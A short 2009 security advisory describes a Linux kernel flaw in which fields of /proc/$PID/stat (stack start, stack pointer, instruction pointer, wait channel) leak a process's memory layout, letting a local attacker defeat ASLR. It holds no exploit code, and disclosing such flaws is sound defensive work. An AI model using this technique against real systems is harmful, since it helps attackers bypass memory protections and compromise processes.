Vigil@nce: Linux kernel, information disclosure on a process
May 2009 by Vigil@nce
A local attacker can obtain information about the memory structure of a process in order to bypass ASLR.
Consequences: data reading
Provenance: user shell
Means of attack: 1 attack
Ability of attacker: technician (2/4)
Confidence: confirmed by the editor (5/5)
Diffusion of the vulnerable configuration: high (3/3)
Creation date: 11/05/2009
DESCRIPTION OF THE VULNERABILITY
The ASLR (Address Space Layout Randomization) feature randomizes various sections (stack, heap and libraries) of a process. Attacks using assembler code are thus harder to implement.
The /proc/$PID/stat file contains information about the state of a
27th field: start_stack (start of stack)
28th field: esp (current address of the stack)
29th field: eip (current instruction)
34th field: wchan (waiting function, such as wait(), which can also be found in /proc/$PID/wchan)
A local attacker can sample data from this file in order to find various values. He can thus slowly reconstruct the structure of the stack and addresses of libraries.
A local attacker can therefore obtain information about the memory structure of a process in order to bypass ASLR.